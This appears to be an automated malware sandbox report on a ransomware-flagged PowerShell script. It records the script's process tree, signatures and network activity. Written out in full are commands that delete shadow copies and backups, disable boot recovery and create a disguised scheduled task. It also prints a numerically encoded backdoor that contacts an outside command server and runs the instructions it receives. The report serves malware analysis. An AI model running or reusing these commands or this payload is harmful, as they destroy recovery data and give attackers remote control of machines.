memory/848-60-0x0000000000000000-mapping.dmp

memory/1204-61-0x0000000000000000-mapping.dmp

memory/2012-63-0x0000000002110000-0x0000000002190000-memory.dmp

memory/1344-64-0x0000000000000000-mapping.dmp

memory/1524-66-0x0000000000000000-mapping.dmp

memory/1164-68-0x0000000000000000-mapping.dmp

memory/1616-69-0x0000000000000000-mapping.dmp

memory/1628-70-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 ee70d11d85ab576b1b2614b2f0e2e878
SHA1 985253c1e0eff325a7b7e0092e2dc055c00cf620
SHA256 1442116d3e52e3c305f649a8e2feef751fd9a8b17020147ac0f422184187b472
SHA512 01d7c66d57d0b70d9bf186f314c621a99737e0f271d424282ee4bfb970e84e8cdbac92c4384b0f56ed683f3315c51dbe6439014984baf59a1ad7eac12b707cbf

memory/1628-73-0x000007FEF33C0000-0x000007FEF3DE3000-memory.dmp

memory/1628-74-0x000007FEF2860000-0x000007FEF33BD000-memory.dmp

memory/1628-75-0x0000000002884000-0x0000000002887000-memory.dmp

memory/1628-76-0x0000000002884000-0x0000000002887000-memory.dmp

memory/1628-77-0x000000000288B000-0x00000000028AA000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-10-09 09:36

Reported

2022-10-09 09:38

Platform

win10v2004-20220812-en

Max time kernel

100s

Max time network

144s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba.ps1

Signatures

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes System State backups

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Deletes system backups

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3132 wrote to memory of 4808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 3132 wrote to memory of 4808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 3132 wrote to memory of 1944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bcdedit.exe
PID 3132 wrote to memory of 1944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bcdedit.exe
PID 3132 wrote to memory of 1984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bcdedit.exe
PID 3132 wrote to memory of 1984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bcdedit.exe
PID 3132 wrote to memory of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 3132 wrote to memory of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 3132 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 3132 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 3132 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 3132 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wbadmin.exe
PID 3132 wrote to memory of 316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\vssadmin.exe
PID 3132 wrote to memory of 316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\vssadmin.exe
PID 3132 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wscript.exe
PID 3132 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wscript.exe
PID 3132 wrote to memory of 3740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3132 wrote to memory of 3740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba.ps1

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 19 /du 23:59 /TR %PUBLIC%\Libraries\WindowsIndexingService.vbs

C:\Windows\system32\bcdedit.exe

"C:\Windows\system32\bcdedit.exe" /set yifydxwzg bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

"C:\Windows\system32\bcdedit.exe" /set yifydxwzg recoveryenabled no

C:\Windows\system32\wbadmin.exe

"C:\Windows\system32\wbadmin.exe" delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\system32\wbadmin.exe

"C:\Windows\system32\wbadmin.exe" delete systemstatebackup

C:\Windows\system32\wbadmin.exe

"C:\Windows\system32\wbadmin.exe" delete backup

C:\Windows\system32\vssadmin.exe

"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wscript.exe

"C:\Windows\system32\wscript.exe" %PUBLIC%\Libraries\WindowsIndexingService.vbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c =[string][System.Text.Encoding]::ASCII.GetString 36 100 97 99 121 122 122 97 118 105 104 32 61 32 36 101 110 118 58 80 85 66 76 73 67 32 43 32 34 92 76 105 98 114 97 114 105 101 115 34 10 105 102 32 40 45 110 111 116 32 40 84 101 115 116 45 80 97 116 104 32 36 100 97 99 121 122 122 97 118 105 104 41 41 32 123 32 109 100 32 36 100 97 99 121 122 122 97 118 105 104 59 32 125 10 36 104 118 121 102 97 118 100 32 61 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 118 98 115 34 59 10 36 119 119 115 100 100 100 97 99 121 99 32 32 61 32 34 49 48 48 49 46 51 34 59 10 36 98 116 101 100 115 118 97 116 102 97 32 61 32 36 101 110 118 58 116 101 109 112 32 43 32 34 92 65 70 88 53 48 48 53 56 46 116 109 112 34 59 10 36 122 102 116 97 115 106 101 32 32 61 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 116 104 117 109 98 99 97 99 104 101 95 54 52 46 100 98 34 59 10 36 109 121 117 114 108 112 111 115 116 32 61 32 36 102 97 108 115 101 59 10 36 115 102 118 104 120 117 100 101 32 61 32 34 119 34 59 10 10 102 117 110 99 116 105 111 110 32 105 97 109 119 111 114 107 50 123 32 115 99 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 86 97 108 117 101 32 36 40 71 101 116 45 68 97 116 101 41 59 32 125 59 10 102 117 110 99 116 105 111 110 32 100 121 97 120 117 98 116 105 106 118 40 32 36 119 103 104 102 117 99 101 102 117 32 41 123 10 32 32 105 102 40 32 36 119 103 104 102 117 99 101 102 117 32 45 109 97 116 99 104 32 39 79 117 116 79 102 77 101 109 111 114 121 69 120 99 101 112 116 105 111 110 39 32 41 123 10 32 32 32 32 114 105 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 70 111 114 99 101 59 10 32 32 32 32 103 101 116 45 112 114 111 99 101 115 115 32 112 111 119 101 114 115 104 101 108 108 42 32 124 32 115 116 111 112 45 112 114 111 99 101 115 115 59 10 32 32 32 32 101 120 105 116 59 10 32 32 125 59 10 125 10 10 102 117 110 99 116 105 111 110 32 115 101 110 100 112 111 115 116 50 40 32 36 119 103 104 102 117 99 101 102 117 32 41 123 10 32 32 105 102 40 32 33 36 109 121 117 114 108 112 111 115 116 32 41 123 32 114 101 116 117 114 110 32 36 102 97 108 115 101 59 32 125 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 32 61 32 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 46 67 114 101 100 101 110 116 105 97 108 115 32 61 32 91 83 121 115 116 101 109 46 78 101 116 46 67 114 101 100 101 110 116 105 97 108 67 97 99 104 101 93 58 58 68 101 102 97 117 108 116 67 114 101 100 101 110 116 105 97 108 115 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 46 72 101 97 100 101 114 115 46 65 100 100 40 34 67 111 110 116 101 110 116 45 84 121 112 101 34 44 32 34 97 112 112 108 105 99 97 116 105 111 110 47 120 45 119 119 119 45 102 111 114 109 45 117 114 108 101 110 99 111 100 101 100 34 41 59 10 32 32 36 105 115 106 100 97 121 117 104 120 101 46 69 110 99 111 100 105 110 103 32 61 32 91 83 121 115 116 101 109 46 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 59 10 32 32 116 114 121 123 10 32 32 32 32 36 100 104 104 119 121 120 118 121 32 61 32 36 105 115 106 100 97 121 117 104 120 101 46 85 112 108 111 97 100 83 116 114 105 110 103 40 32 36 109 121 117 114 108 112 111 115 116 44 32 34 108 61 34 43 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 91 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 40 32 34 118 61 36 119 119 115 100 100 100 97 99 121 99 38 103 117 105 100 61 36 120 100 115 118 117 118 106 120 122 120 38 34 32 43 32 36 119 103 104 102 117 99 101 102 117 32 41 32 41 32 41 32 41 59 10 32 32 32 32 36 100 104 104 119 121 120 118 121 32 61 32 91 115 116 114 105 110 103 93 91 83 121 115 116 101 109 46 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 65 83 67 73 73 46 71 101 116 83 116 114 105 110 103 40 91 83 121 115 116 101 109 46 67 111 110 118 101 114 116 93 58 58 70 114 111 109 66 97 115 101 54 52 83 116 114 105 110 103 40 32 36 100 104 104 119 121 120 118 121 32 41 32 41 59 10 32 32 32 32 105 102 40 32 33 36 115 102 118 104 120 117 100 101 32 41 123 32 114 101 116 117 114 110 32 36 102 97 108 115 101 59 32 125 10 32 32 32 32 105 102 40 32 36 101 119 106 97 121 120 97 101 119 117 32 45 101 113 32 36 100 104 104 119 121 120 118 121 46 83 117 98 115 116 114 105 110 103 40 48 44 49 54 41 32 41 123 10 32 32 32 32 32 32 114 101 116 117 114 110 32 36 100 104 104 119 121 120 118 121 46 83 117 98 115 116 114 105 110 103 40 49 54 44 36 100 104 104 119 121 120 118 121 46 108 101 110 103 116 104 45 49 54 41 32 59 10 32 32 32 32 125 101 108 115 101 123 10 32 32 32 32 32 32 36 115 102 118 104 120 117 100 101 32 61 32 36 102 97 108 115 101 59 10 32 32 32 32 32 32 115 101 110 100 112 111 115 116 50 32 40 34 101 114 114 111 114 61 34 32 43 32 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 91 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 36 100 104 104 119 121 120 118 121 32 41 32 41 32 41 59 10 32 32 32 32 125 10 32 32 125 99 97 116 99 104 123 10 32 32 32 32 100 121 97 120 117 98 116 105 106 118 32 36 95 46 69 120 99 101 112 116 105 111 110 46 77 101 115 115 97 103 101 59 10 32 32 32 32 36 115 102 118 104 120 117 100 101 32 61 32 36 102 97 108 115 101 59 10 32 32 32 32 36 105 115 106 100 97 121 117 104 120 101 46 85 112 108 111 97 100 83 116 114 105 110 103 40 32 36 109 121 117 114 108 112 111 115 116 44 32 34 108 61 34 43 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 91 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 40 32 34 118 61 36 119 119 115 100 100 100 97 99 121 99 38 103 117 105 100 61 36 120 100 115 118 117 118 106 120 122 120 38 101 114 114 111 114 61 115 101 110 100 112 111 115 116 50 58 34 32 43 32 36 109 121 117 114 108 112 111 115 116 43 34 58 34 43 36 100 104 104 119 121 120 118 121 32 43 34 58 34 43 32 36 95 46 69 120 99 101 112 116 105 111 110 46 77 101 115 115 97 103 101 32 41 32 41 32 41 32 41 59 10 32 32 125 59 10 32 32 114 101 116 117 114 110 32 36 102 97 108 115 101 59 10 125 59 10 10 102 117 110 99 116 105 111 110 32 122 100 105 102 102 118 97 104 115 40 32 36 121 121 102 104 103 104 119 115 32 41 123 10 32 32 36 106 119 117 115 103 104 100 32 61 32 34 104 116 116 112 58 47 47 107 97 109 97 46 109 105 97 108 101 101 107 97 46 99 111 109 47 34 59 10 32 32 34 104 101 101 34 44 34 120 117 49 34 44 34 104 115 48 34 44 34 106 100 53 34 44 34 109 113 102 34 32 124 32 37 123 32 36 106 119 117 115 103 104 100 32 43 61 32 34 44 34 43 34 104 116 116 112 58 47 47 34 43 32 40 32 91 67 111 110 118 101 114 116 93 58 58 84 111 66 97 115 101 54 52 83 116 114 105 110 103 40 32 91 83 121 115 116 101 109 46 84 101 120 116 46 69 110 99 111 100 105 110 103 93 58 58 85 84 70 56 46 71 101 116 66 121 116 101 115 40 32 36 95 43 32 36 40 71 101 116 45 68 97 116 101 32 45 85 70 111 114 109 97 116 32 34 37 121 37 109 37 86 34 41 32 41 32 41 46 116 111 76 111 119 101 114 40 41 32 41 32 43 34 46 116 111 112 47 34 59 32 125 59 10 32 32 36 106 119 117 115 103 104 100 46 115 112 108 105 116 40 34 44 34 41 32 124 32 37 123 10 32 32 32 32 105 102 40 32 33 36 109 121 117 114 108 112 111 115 116 32 41 123 10 32 32 32 32 32 32 36 109 121 117 114 108 112 111 115 116 32 61 32 36 95 59 10 32 32 32 32 32 32 105 102 40 32 33 40 115 101 110 100 112 111 115 116 50 32 40 36 121 121 102 104 103 104 119 115 32 43 32 34 38 100 111 109 101 110 61 36 109 121 117 114 108 112 111 115 116 34 32 41 41 32 41 123 32 36 109 121 117 114 108 112 111 115 116 32 61 32 36 102 97 108 115 101 59 32 125 59 10 32 32 32 32 32 32 83 116 97 114 116 45 83 108 101 101 112 32 45 115 32 53 59 10 32 32 32 32 125 10 32 32 125 59 10 32 32 105 102 40 32 36 121 121 102 104 103 104 119 115 32 45 109 97 116 99 104 32 34 115 116 97 116 117 115 61 114 101 103 105 115 116 101 114 34 32 41 123 10 32 32 32 32 114 101 116 117 114 110 32 34 111 107 34 59 10 32 32 125 101 108 115 101 123 10 32 32 32 32 114 101 116 117 114 110 32 36 109 121 117 114 108 112 111 115 116 59 10 32 32 125 32 10 125 59 10 10 105 102 32 40 32 84 101 115 116 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 41 123 10 32 32 105 102 32 40 32 40 32 40 32 78 69 87 45 84 73 77 69 83 80 65 78 32 45 83 116 97 114 116 32 40 40 71 101 116 45 67 104 105 108 100 73 116 101 109 32 36 98 116 101 100 115 118 97 116 102 97 32 41 46 67 114 101 97 116 105 111 110 84 105 109 101 41 32 45 69 110 100 32 40 71 101 116 45 68 97 116 101 41 41 46 77 105 110 117 116 101 115 32 41 32 45 103 116 32 49 53 32 41 123 10 32 32 32 32 114 105 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 70 111 114 99 101 59 10 32 32 32 32 116 114 121 123 32 103 101 116 45 112 114 111 99 101 115 115 32 112 111 119 101 114 115 104 101 108 108 42 32 124 32 115 116 111 112 45 112 114 111 99 101 115 115 32 125 99 97 116 99 104 123 125 59 10 32 32 32 32 101 120 105 116 59 10 32 32 125 101 108 115 101 123 32 101 120 105 116 59 32 125 59 10 125 59 10 10 102 117 110 99 116 105 111 110 32 119 98 117 118 104 121 118 40 32 36 120 121 104 103 104 119 118 100 32 41 123 10 32 32 105 102 40 32 36 120 121 104 103 104 119 118 100 32 41 123 10 32 32 32 32 115 99 32 45 80 97 116 104 32 36 122 102 116 97 115 106 101 32 45 86 97 108 117 101 32 40 32 91 103 117 105 100 93 58 58 78 101 119 71 117 105 100 40 41 44 32 40 32 91 103 117 105 100 93 58 58 78 101 119 71 117 105 100 40 41 32 45 114 101 112 108 97 99 101 32 39 45 39 44 39 39 32 41 46 83 117 98 115 116 114 105 110 103 40 48 44 49 54 41 32 32 45 106 111 105 110 32 39 44 39 32 41 32 45 70 111 114 99 101 59 32 32 10 32 32 32 32 103 105 32 36 122 102 116 97 115 106 101 32 45 70 111 114 99 101 32 124 32 32 37 123 32 36 95 46 65 116 116 114 105 98 117 116 101 115 32 61 32 34 72 105 100 100 101 110 34 32 125 59 10 32 32 32 32 116 114 121 123 10 32 32 32 32 32 32 36 116 101 103 98 101 121 120 102 32 61 32 91 69 110 118 105 114 111 110 109 101 110 116 93 58 58 71 101 116 70 111 108 100 101 114 80 97 116 104 40 39 83 116 97 114 116 117 112 39 41 32 43 32 39 92 87 105 110 100 111 119 115 65 112 112 108 105 99 97 116 105 111 110 83 101 114 118 105 99 101 46 108 110 107 39 59 10 32 32 32 32 32 32 105 102 40 32 45 110 111 116 32 40 32 84 101 115 116 45 80 97 116 104 32 36 116 101 103 98 101 121 120 102 32 41 32 41 123 10 32 32 32 32 32 32 32 32 36 122 106 98 98 100 99 105 100 100 119 32 61 32 78 101 119 45 79 98 106 101 99 116 32 45 67 111 109 79 98 106 101 99 116 32 40 39 87 83 99 114 105 112 116 46 83 104 101 108 108 39 41 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 32 61 32 36 122 106 98 98 100 99 105 100 100 119 46 67 114 101 97 116 101 83 104 111 114 116 99 117 116 40 32 36 116 101 103 98 101 121 120 102 32 32 41 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 84 97 114 103 101 116 80 97 116 104 32 61 32 36 104 118 121 102 97 118 100 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 87 111 114 107 105 110 103 68 105 114 101 99 116 111 114 121 32 61 32 36 100 97 99 121 122 122 97 118 105 104 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 87 105 110 100 111 119 83 116 121 108 101 32 61 32 49 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 68 101 115 99 114 105 112 116 105 111 110 32 61 32 39 87 105 110 100 111 119 115 32 65 112 112 108 105 99 97 116 105 111 110 32 83 101 114 118 105 99 101 39 59 10 32 32 32 32 32 32 32 32 36 100 115 100 99 98 97 106 119 46 83 97 118 101 40 41 59 10 32 32 32 32 32 32 125 10 32 32 32 32 125 99 97 116 99 104 123 125 59 10 32 32 32 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 40 103 101 116 45 99 111 110 116 101 110 116 32 36 122 102 116 97 115 106 101 41 46 115 112 108 105 116 40 39 44 39 41 59 10 32 32 32 32 36 97 102 105 101 104 104 97 32 61 32 34 115 116 97 116 117 115 61 114 101 103 105 115 116 101 114 38 115 115 105 100 61 36 101 119 106 97 121 120 97 101 119 117 38 111 115 61 34 43 40 91 115 116 114 105 110 103 93 36 80 83 86 101 114 115 105 111 110 84 97 98 108 101 46 66 117 105 108 100 86 101 114 115 105 111 110 41 43 34 38 112 115 118 101 114 61 34 43 40 32 40 32 40 71 101 116 45 72 111 115 116 41 46 86 101 114 115 105 111 110 32 41 46 77 97 106 111 114 32 41 43 32 34 38 99 111 109 112 95 110 97 109 101 61 34 32 43 32 40 40 71 101 116 45 87 109 105 79 98 106 101 99 116 32 45 99 108 97 115 115 32 87 105 110 51 50 95 67 111 109 112 117 116 101 114 83 121 115 116 101 109 32 45 80 114 111 112 101 114 116 121 32 78 97 109 101 41 46 78 97 109 101 46 116 114 105 109 40 41 32 41 59 10 32 32 32 32 105 102 40 32 84 101 115 116 45 80 97 116 104 32 40 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 116 104 117 109 98 99 97 99 104 101 95 51 51 46 100 98 34 32 41 32 41 123 10 32 32 32 32 32 32 114 105 32 45 80 97 116 104 32 40 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 116 104 117 109 98 99 97 99 104 101 95 51 51 46 100 98 34 32 41 44 32 40 32 36 100 97 99 121 122 122 97 118 105 104 32 43 32 34 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 106 115 34 32 41 32 45 70 111 114 99 101 59 10 32 32 32 32 32 32 116 114 121 123 32 115 99 104 116 97 115 107 115 46 101 120 101 32 47 100 101 108 101 116 101 32 47 84 78 32 34 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 34 32 47 102 32 125 99 97 116 99 104 123 125 10 32 32 32 32 32 32 116 114 121 123 32 115 99 104 116 97 115 107 115 46 101 120 101 32 47 100 101 108 101 116 101 32 47 84 78 32 34 87 105 110 100 111 119 115 32 73 110 100 101 120 105 110 103 32 83 101 114 118 105 99 101 34 32 47 102 32 125 99 97 116 99 104 123 125 10 32 32 32 32 32 32 105 102 40 32 84 101 115 116 45 80 97 116 104 32 40 32 91 69 110 118 105 114 111 110 109 101 110 116 93 58 58 71 101 116 70 111 108 100 101 114 80 97 116 104 40 39 83 116 97 114 116 117 112 39 41 32 43 32 39 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 108 110 107 39 32 41 32 32 41 123 10 32 32 32 32 32 32 32 32 114 105 32 45 80 97 116 104 32 40 32 91 69 110 118 105 114 111 110 109 101 110 116 93 58 58 71 101 116 70 111 108 100 101 114 80 97 116 104 40 39 83 116 97 114 116 117 112 39 41 32 43 32 39 92 87 105 110 100 111 119 115 73 110 100 101 120 105 110 103 83 101 114 118 105 99 101 46 108 110 107 39 32 41 32 45 70 111 114 99 101 59 10 32 32 32 32 32 32 125 10 32 32 32 32 125 10 32 32 32 32 36 116 116 100 105 104 120 99 121 98 101 32 61 32 122 100 105 102 102 118 97 104 115 32 36 97 102 105 101 104 104 97 59 10 32 32 32 32 105 102 40 32 36 116 116 100 105 104 120 99 121 98 101 32 45 110 101 32 34 111 107 34 41 123 10 32 32 32 32 32 32 114 105 32 45 80 97 116 104 32 36 122 102 116 97 115 106 101 32 45 70 111 114 99 101 59 10 32 32 32 32 32 32 101 120 105 116 59 10 32 32 32 32 125 10 32 32 125 10 32 32 114 101 116 117 114 110 32 40 103 101 116 45 99 111 110 116 101 110 116 32 36 122 102 116 97 115 106 101 41 46 115 112 108 105 116 40 39 44 39 41 59 10 125 10 36 118 100 97 105 116 104 102 32 61 32 40 115 99 104 116 97 115 107 115 46 101 120 101 32 47 99 114 101 97 116 101 32 47 84 78 32 34 87 105 110 100 111 119 115 65 112 112 108 105 99 97 116 105 111 110 83 101 114 118 105 99 101 34 32 47 115 99 32 68 65 73 76 89 32 47 115 116 32 48 48 58 48 48 32 47 102 32 47 82 73 32 49 57 32 47 100 117 32 50 51 58 53 57 32 47 84 82 32 36 104 118 121 102 97 118 100 41 59 32 10 105 102 32 40 32 84 101 115 116 45 80 97 116 104 32 36 122 102 116 97 115 106 101 32 41 123 10 32 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 32 119 98 117 118 104 121 118 32 36 102 97 108 115 101 59 10 32 32 105 102 40 32 36 101 119 106 97 121 120 97 101 119 117 46 108 101 110 103 116 104 32 45 110 101 32 49 54 32 32 41 123 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 32 119 98 117 118 104 121 118 32 36 116 114 117 101 59 32 125 10 125 101 108 115 101 123 10 32 32 36 120 100 115 118 117 118 106 120 122 120 44 32 36 101 119 106 97 121 120 97 101 119 117 32 61 32 32 119 98 117 118 104 121 118 32 36 116 114 117 101 59 10 125 10 36 109 121 117 114 108 112 111 115 116 32 61 32 122 100 105 102 102 118 97 104 115 59 10 119 104 105 108 101 40 32 36 115 102 118 104 120 117 100 101 32 41 123 10 32 32 105 97 109 119 111 114 107 50 59 10 32 32 116 114 121 123 10 32 32 32 32 105 102 40 32 36 115 102 118 104 120 117 100 101 32 45 97 110 100 32 40 36 115 102 118 104 120 117 100 101 46 108 101 110 103 116 104 32 45 103 116 32 51 48 41 32 32 41 123 10 32 32 32 32 32 32 105 101 120 32 36 115 102 118 104 120 117 100 101 59 10 32 32 32 32 125 59 10 32 32 125 99 97 116 99 104 123 32 100 121 97 120 117 98 116 105 106 118 32 36 95 46 69 120 99 101 112 116 105 111 110 46 77 101 115 115 97 103 101 59 32 125 59 10 32 32 83 116 97 114 116 45 83 108 101 101 112 32 45 115 32 50 56 48 59 10 32 32 36 115 102 118 104 120 117 100 101 32 61 32 115 101 110 100 112 111 115 116 50 59 10 125 59 10 114 105 32 45 80 97 116 104 32 36 98 116 101 100 115 118 97 116 102 97 32 45 70 111 114 99 101 59 10

Network

Country Destination Domain Proto
US 20.189.173.13:443 tcp
NL 104.80.225.205:443 tcp
NL 95.101.78.82:80 tcp
NL 95.101.78.82:80 tcp
US 209.197.3.8:80 tcp

Files

memory/3132-132-0x0000023EBC6A0000-0x0000023EBC6C2000-memory.dmp

memory/4808-133-0x0000000000000000-mapping.dmp

memory/3132-134-0x00007FFAA26C0000-0x00007FFAA3181000-memory.dmp

memory/1944-135-0x0000000000000000-mapping.dmp

memory/1984-136-0x0000000000000000-mapping.dmp

memory/1740-137-0x0000000000000000-mapping.dmp

memory/2148-138-0x0000000000000000-mapping.dmp

memory/4276-139-0x0000000000000000-mapping.dmp

memory/316-140-0x0000000000000000-mapping.dmp

memory/3244-141-0x0000000000000000-mapping.dmp

memory/3740-142-0x0000000000000000-mapping.dmp

memory/3740-143-0x00007FFAA26C0000-0x00007FFAA3181000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
